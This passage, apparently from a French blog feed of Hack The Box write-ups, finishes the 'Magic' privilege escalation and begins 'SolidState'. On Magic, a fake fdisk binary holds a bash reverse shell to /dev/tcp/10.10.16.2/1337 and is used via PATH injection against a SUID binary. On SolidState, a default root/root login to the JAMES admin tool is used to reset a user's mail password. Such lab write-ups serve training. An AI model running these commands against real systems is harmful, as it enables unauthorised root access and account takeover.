<span class="m">600</span> theseus.key </span></span><span class="line"><span class="cl">$ ssh theseus@10.10.10.185 -i theseus.key </span></span><span class="line"><span class="cl">Welcome to Ubuntu 18.04.4 LTS <span class="o">(</span>GNU/Linux 5.3.0-42-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">theseus@magic:~$ whoami </span></span><span class="line"><span class="cl">theseus </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="suid-binary--binsysinfo">SUID binary : /bin/sysinfo </h3><p>On découvre que le binaire &ldquo;/bin/sysinfo&rdquo; a le bit SUID activé, grâce à l&rsquo;énumeration avec <strong>linpeas</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">theseus@magic:~$ cat linpeas.out <span class="p">|</span> grep -i SUID </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">╔══════════╣ SUID - Check easy privesc, exploits and write perms </span></span><span class="line"><span class="cl">╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">-rwsr-x--- <span class="m">1</span> root users 22K Oct <span class="m">21</span> <span class="m">2019</span> /bin/sysinfo <span class="o">(</span>Unknown SUID binary!<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="fdisk-execution-in-binsysinfo">fdisk execution in /bin/sysinfo </h3><p>Pour faire une attaque &ldquo;PATH injection&rdquo; sur le binaire <strong>SUID</strong>, j&rsquo;ai pu utiliser strace, ltrace ou encore <strong>strings</strong>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">theseus@magic:~/bin$ strings /bin/sysinfo <span class="p">|</span> less </span></span><span class="line"><span class="cl">/lib64/ld-linux-x86-64.so.2 </span></span><span class="line"><span class="cl">libstdc++.so.6 </span></span><span class="line"><span class="cl">__gmon_start__ </span></span><span class="line"><span class="cl">_ITM_deregisterTMCloneTable </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="o">====================</span>Hardware <span class="nv">Info</span><span class="o">====================</span> </span></span><span class="line"><span class="cl">lshw -short </span></span><span class="line"><span class="cl"><span class="o">====================</span>Disk <span class="nv">Info</span><span class="o">====================</span> </span></span><span class="line"><span class="cl">fdisk -l </span></span><span class="line"><span class="cl"><span class="o">====================</span>CPU <span class="nv">Info</span><span class="o">====================</span> </span></span><span class="line"><span class="cl">cat /proc/cpuinfo </span></span><span class="line"><span class="cl"><span class="o">====================</span>MEM <span class="nv">Usage</span><span class="o">=====================</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On observe l&rsquo;execution de lshw, fdisk ou encore cat, sans le path absolu. Ex: /bin/cat. On peut donc faire une PATH injection. J&rsquo;ai choisi de le faire avec fdisk.</p> <h3 id="creating-fake-fdisk-binary-with-reverse-shell">Creating fake &ldquo;fdisk&rdquo; binary with reverse shell </h3><p>On crée un faux binaire <strong>fdisk</strong> dans le dossier <strong>bin/</strong> qu&rsquo;on ajoute ensuite au <strong>PATH</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">theseus@magic:~$ mkdir bin<span class="p">;</span><span class="nb">cd</span> bin </span></span><span class="line"><span class="cl">theseus@magic:~/bin$ nano fdisk </span></span><span class="line"><span class="cl"><span class="c1">##!/bin/bash</span> </span></span><span class="line"><span class="cl">bash -i &gt;<span class="p">&amp;</span> /dev/tcp/10.10.16.2/1337 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span><span class="line"><span class="cl">theseus@magic:~/bin$ <span class="nb">export</span> <span class="nv">PATH</span><span class="o">=</span><span class="s2">&#34;/home/theseus/bin:</span><span class="nv">$PATH</span><span class="s2">&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="root-shell-using-path-injection">Root shell using PATH injection </h3><p>On execute ensuite le binaire /bin/sysinfo, qui va executer la commande <strong>fdisk</strong> en tant que root. Comme mon dossier <strong>bin</strong> contient aussi un binaire fdisk, ET qu&rsquo;il est en en premier dans la liste des dossiers du PATH, alors le programme va décider de l&rsquo;executer à la place du véritable binaire :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">theseus@magic:~/bin$ /bin/sysinfo </span></span><span class="line"><span class="cl"><span class="o">====================</span>Hardware <span class="nv">Info</span><span class="o">====================</span> </span></span><span class="line"><span class="cl">H/W path Device Class <span class="nv">Description</span> </span></span><span class="line"><span class="cl"><span class="o">====================================================</span> </span></span><span class="line"><span class="cl"> system VMware Virtual Platform </span></span><span class="line"><span class="cl">/0 bus 440BX Desktop Reference Platform </span></span><span class="line"><span class="cl">/0/0 memory 86KiB BIOS </span></span><span class="line"><span class="cl">/0/1 processor AMD EPYC <span class="m">7763</span> 64-Core Processor </span></span><span class="line"><span class="cl">/0/1/0 memory 16KiB L1 cache </span></span><span class="line"><span class="cl">/0/1/1 memory 16KiB L1 cache </span></span><span class="line"><span class="cl">/0/1/2 memory 512KiB L2 cache </span></span><span class="line"><span class="cl">/0/1/3 memory 512KiB L2 cache </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">====================</span>Disk <span class="nv">Info</span><span class="o">====================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.185. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.185:48804. </span></span><span class="line"><span class="cl">root@magic:~/bin# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@magic:~# <span class="nb">cd</span> /root </span></span><span class="line"><span class="cl">root@magic:/root# cat root.txt </span></span><span class="line"><span class="cl">c21a.....fa6b </span></span></code></pre></td></tr></table> </div> </div>HTB | SolidStatehttps://leopoldabgn.github.io/writeups/p/solidstate-htb/Tue, 22 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/solidstate-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="SolidState cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">SolidState</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.51</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mindy : P@55W0rd1!2@ </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.51 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.4p1 Debian 10+deb9u1 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 770084f578b9c7d354cf712e0d526d8b <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp5WdwlckuF4slNUO29xOk/Yl/cnXT/p6qwezI0ye+4iRSyor8lhyAEku/yz8KJXtA+ALhL7HwYbD3hDUxDkFw90V1Omdedbk7SxUVBPK2CiDpvXq1+r5fVw26WpTCdawGKkaOMYoSWvliBsbwMLJEUwVbZ/GZ1SUEswpYkyZeiSC1qk72L6CiZ9/5za4MTZw8Cq0akT7G+mX7Qgc+5eOEGcqZt3cBtWzKjHyOZJAEUtwXAHly29KtrPUddXEIF0qJUxKXArEDvsp7OkuQ0fktXXkZuyN/GRFeu3im7uQVuDgiXFKbEfmoQAsvLrR8YiKFUG6QBdI9awwmTkLFbS1Z </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 78b83af660190691f553921d3f48ed53 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBISyhm1hXZNQl3cslogs5LKqgWEozfjs3S3aPy4k3riFb6UYu6Q1QsxIEOGBSPAWEkevVz1msTrRRyvHPiUQ+eE<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> e445e9ed074d7369435a12709dc4af76 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKbFbK3MJqjMh9oEw/2OVe0isA7e3ruHz5fhUP4cVgY </span></span><span class="line"><span class="cl">25/tcp open smtp syn-ack ttl <span class="m">63</span> JAMES smtpd 2.3.2 </span></span><span class="line"><span class="cl"><span class="p">|</span>_smtp-commands: solidstate Hello nmap.scanme.org <span class="o">(</span>10.10.14.3 <span class="o">[</span>10.10.14.3<span class="o">])</span> </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.25 <span class="o">((</span>Debian<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: OPTIONS HEAD GET POST </span></span><span class="line"><span class="cl">110/tcp open pop3 syn-ack ttl <span class="m">63</span> JAMES pop3d 2.3.2 </span></span><span class="line"><span class="cl">119/tcp open nntp syn-ack ttl <span class="m">63</span> JAMES nntpd <span class="o">(</span>posting ok<span class="o">)</span> </span></span><span class="line"><span class="cl">4555/tcp open rsip? syn-ack ttl <span class="m">63</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> fingerprint-strings: </span></span><span class="line"><span class="cl"><span class="p">|</span> GenericLines: </span></span><span class="line"><span class="cl"><span class="p">|</span> JAMES Remote Administration Tool 2.3.2 </span></span><span class="line"><span class="cl"><span class="p">|</span> Please enter your login and password </span></span><span class="line"><span class="cl"><span class="p">|</span> Login id: </span></span><span class="line"><span class="cl"><span class="p">|</span> Password: </span></span><span class="line"><span class="cl"><span class="p">|</span> Login failed <span class="k">for</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Login id: </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="james-remote-administration-tool-232-port-5557">JAMES Remote Administration Tool 2.3.2 (port 5557) </h3><p>On observe un service tournant sur le port 5557, demandant un user/password. En cherchant sur internet, on trouve des credentials par défaut pour cet outil : root / root</p> <p>On peut alors lister les users, et changer leur mot de passe permettant l&rsquo;accès à leur boite mail. Ici, on change le mot de passe de l&rsquo;utilisateur <strong>mindy</strong>, password : <strong>mindy</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">telnet 10.10.10.51 <span class="m">4555</span> </span></span><span class="line"><span class="cl">Trying 10.10.10.51... </span></span><span class="line"><span class="cl">Connected to 10.10.10.51. </span></span><span class="line"><span class="cl">Escape character is <span class="s1">&#39;^]&#39;</span>. </span></span><span class="line"><span class="cl">JAMES Remote Administration Tool 2.3.2 </span></span><span class="line"><span class="cl">Please enter your login and password </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Login id: </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">Welcome root. HELP <span class="k">for</span> a list of commands </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">HELP </span></span><span class="line"><span class="cl">Currently implemented commands: </span></span><span class="line"><span class="cl"><span class="nb">help</span> display this <span class="nb">help</span> </span></span><span class="line"><span class="cl">listusers display existing accounts </span></span><span class="line"><span class="cl">countusers display the number of existing accounts </span></span><span class="line"><span class="cl">adduser <span class="o">[</span>username<span class="o">]</span> <span class="o">[</span>password<span class="o">]</span> add a new user </span></span><span class="line"><span class="cl">verify <span class="o">[</span>username<span class="o">]</span> verify <span class="k">if</span> specified user exist </span></span><span class="line"><span class="cl">deluser <span class="o">[</span>username<span class="o">]</span> delete existing user </span></span><span class="line"><span class="cl">setpassword <span class="o">[</span>username<span class="o">]</span> <span class="o">[</span>password<span class="o">]</span> sets a user<span class="s1">&#39;s password </span></span></span><span class="line"><span class="cl"><span class="s1">setalias [user] [alias] locally forwards all email for &#39;</span>user<span class="s1">&#39; to &#39;</span>alias<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">showalias [username] shows a user&#39;</span>s current email <span class="nb">alias</span> </span></span><span class="line"><span class="cl">unsetalias <span class="o">[</span>user<span class="o">]</span> unsets an <span class="nb">alias</span> <span class="k">for</span> <span class="s1">&#39;user&#39;</span> </span></span><span class="line"><span class="cl">setforwarding <span class="o">[</span>username<span class="o">]</span> <span class="o">[</span>emailaddress<span class="o">]</span> forwards a user<span class="s1">&#39;s email to another email address </span></span></span><span class="line"><span class="cl"><span class="s1">showforwarding [username] shows a user&#39;</span>s current email forwarding </span></span><span class="line"><span class="cl">unsetforwarding <span class="o">[</span>username<span class="o">]</span> removes a forward </span></span><span class="line"><span class="cl">user <span class="o">[</span>repositoryname<span class="o">]</span> change to another user repository </span></span><span class="line"><span class="cl">shutdown kills the current JVM <span class="o">(</span>convenient when James is run as a daemon<span class="o">)</span> </span></span><span class="line"><span class="cl">quit close connection </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">listusers </span></span><span class="line"><span class="cl">Existing accounts <span class="m">6</span> </span></span><span class="line"><span class="cl">user: james </span></span><span class="line"><span class="cl">user: ../../../../../../../../etc/bash_completion.d </span></span><span class="line"><span class="cl">user: thomas </span></span><span class="line"><span class="cl">user: john </span></span><span class="line"><span class="cl">user: mindy </span></span><span class="line"><span class="cl">user: mailadmin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">setpassword mindy mindy </span></span><span class="line"><span class="cl">Password <span class="k">for</span> mindy reset </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">quit </span></span><span class="line"><span class="cl">Bye </span></span><span class="line"><span class="cl">Connection closed by foreign host. </span></span></code></pre></td></tr></table> </div> </div><h3 id="pop3--mindy-mails">POP3 : mindy mails </h3><p>En utilisant thunderbird on tente d&rsquo;accéder à ses mails. Une vrai galère&hellip; (pas réussi).</p> <p>Avec <strong>telnet</strong>, on se connecte au port 110 (POP3) avec l&rsquo;utilisateur mindy. On trouve 2 emails, que l&rsquo;on récupère :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">telnet 10.10.10.51 <span class="m">110</span> </span></span><span class="line"><span class="cl">Trying 10.10.10.51... </span></span><span class="line"><span class="cl">Connected to 10.10.10.51. </span></span><span class="line"><span class="cl">Escape character is <span class="s1">&#39;^]&#39;</span>. </span></span><span class="line"><span class="cl">USER mindy </span></span><span class="line"><span class="cl">PASS mindy </span></span><span class="line"><span class="cl">LIST </span></span><span class="line"><span class="cl">+OK solidstate POP3 server <span class="o">(</span>JAMES POP3 Server 2.3.2<span class="o">)</span> ready </span></span><span class="line"><span class="cl">+OK </span></span><span class="line"><span class="cl">+OK Welcome mindy </span></span><span class="line"><span class="cl">+OK <span class="m">2</span> <span class="m">1945</span> </span></span><span class="line"><span class="cl"><span class="m">1</span> <span class="m">1109</span> </span></span><span class="line"><span class="cl"><span class="m">2</span> <span class="m">836</span> </span></span><span class="line"><span class="cl">. </span></span><span class="line"><span class="cl">RETR <span class="m">1</span> </span></span><span class="line"><span class="cl">+OK Message follows </span></span><span class="line"><span class="cl">Return-Path: &lt;mailadmin@localhost&gt; </span></span><span class="line"><span class="cl">Message-ID: &lt;5420213.0.1503422039826.JavaMail.root@solidstate&gt; </span></span><span class="line"><span class="cl">MIME-Version: 1.0 </span></span><span class="line"><span class="cl">Content-Type: text/plain<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>us-ascii </span></span><span class="line"><span class="cl">Content-Transfer-Encoding: 7bit </span></span><span class="line"><span class="cl">Delivered-To: mindy@localhost </span></span><span class="line"><span class="cl">Received: from 192.168.11.142 <span class="o">([</span>192.168.11.142<span class="o">])</span> </span></span><span class="line"><span class="cl"> by solidstate <span class="o">(</span>JAMES SMTP Server 2.3.2<span class="o">)</span> with SMTP ID <span class="m">798</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> &lt;mindy@localhost&gt;<span class="p">;</span> </span></span><span class="line"><span class="cl"> Tue, <span class="m">22</span> Aug <span class="m">2017</span> 13:13:42 -0400 <span class="o">(</span>EDT<span class="o">)</span> </span></span><span class="line"><span class="cl">Date: Tue, <span class="m">22</span> Aug <span class="m">2017</span> 13:13:42 -0400 <span class="o">(</span>EDT<span class="o">)</span> </span></span><span class="line"><span class="cl">From: mailadmin@localhost </span></span><span class="line"><span class="cl">Subject: Welcome </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dear Mindy, </span></span><span class="line"><span class="cl">Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will <span class="nb">help</span> you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">We are looking forward to you joining our team and your success at Solid State Security. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Respectfully, </span></span><span class="line"><span class="cl">James </span></span><span class="line"><span class="cl">. </span></span><span class="line"><span class="cl">RETR <span class="m">2</span> </span></span><span class="line"><span class="cl">+OK Message follows </span></span><span class="line"><span class="cl">Return-Path: &lt;mailadmin@localhost&gt; </span></span><span class="line"><span class="cl">Message-ID: &lt;16744123.2.1503422270399.JavaMail.root@solidstate&gt; </span></span><span class="line"><span class="cl">MIME-Version: 1.0 </span></span><span class="line"><span class="cl">Content-Type: text/plain<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>us-ascii </span></span><span class="line"><span class="cl">Content-Transfer-Encoding: 7bit </span></span><span class="line"><span class="cl">Delivered-To: mindy@localhost </span></span><span class="line"><span class="cl">Received: from 192.168.11.142 <span class="o">([</span>192.168.11.142<span class="o">])</span> </span></span><span class="line"><span class="cl"> by solidstate <span class="o">(</span>JAMES SMTP Server 2.3.2<span class="o">)</span> with SMTP ID <span class="m">581</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> &lt;mindy@localhost&gt;<span class="p">;</span> </span></span><span class="line"><span class="cl"> Tue, <span class="m">22</span> Aug <span class="m">2017</span> 13:17:28 -0400 <span class="o">(</span>EDT<span class="o">)</span> </span></span><span class="line"><span class="cl">Date: Tue, <span class="m">22</span> Aug <span class="m">2017</span> 13:17:28 -0400 <span class="o">(</span>EDT<span class="o">)</span> </span></span><span class="line"><span class="cl">From: mailadmin@localhost </span></span><span class="line"><span class="cl">Subject: Your Access </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dear Mindy, </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Here are your ssh credentials to access the system. Remember to reset your password after your first login. </span></span><span class="line"><span class="cl">Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">username: mindy </span></span><span class="line"><span class="cl">pass: P@55W0rd1!2@ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Respectfully, </span></span><span class="line"><span class="cl">James </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">. </span></span><span class="line"><span class="cl">EXIT </span></span><span class="line"><span class="cl">-ERR </span></span><span class="line"><span class="cl">QUIT </span></span><span class="line"><span class="cl">+OK Apache James POP3 Server signing off. </span></span><span class="line"><span class="cl">Connection closed by foreign host. </span></span></code></pre></td></tr></table> </div> </div><p>Dans le deuxième email, on trouve des credentials en clair: mindy : <code>P@55W0rd1!2@</code></p> <h3 id="ssh-connection-to-mindy-account--user-flag">SSH Connection to mindy account : user flag </h3><p>On se connecte en ssh à <strong>mindy</strong> et on récupère le flag utilisateur <strong>user.txt</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh mindy@10.10.10.51 </span></span><span class="line"><span class="cl">mindy@10.10.10.51<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl">Linux solidstate 4.9.0-3-686-pae <span class="c1">#1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The programs included with the Debian GNU/Linux system are free software<span class="p">;</span> </span></span><span class="line"><span class="cl">the exact distribution terms <span class="k">for</span> each program are described in the </span></span><span class="line"><span class="cl">individual files in /usr/share/doc/*/copyright. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent </span></span><span class="line"><span class="cl">permitted by applicable law. </span></span><span class="line"><span class="cl">Last login: Tue Aug <span class="m">22</span> 14:00:02 <span class="m">2017</span> from 192.168.11.142 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">mindy@solidstate:~$ cat user.txt </span></span><span class="line"><span class="cl">c00a.....c6b2 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="mindy--restricted-bash">mindy : restricted bash </h3><p>Par défaut, on arrive dans un restricted shell. Presque aucune action n&rsquo;est autorisé&hellip;</p> <div class="highlight"><div class="chroma"> <table 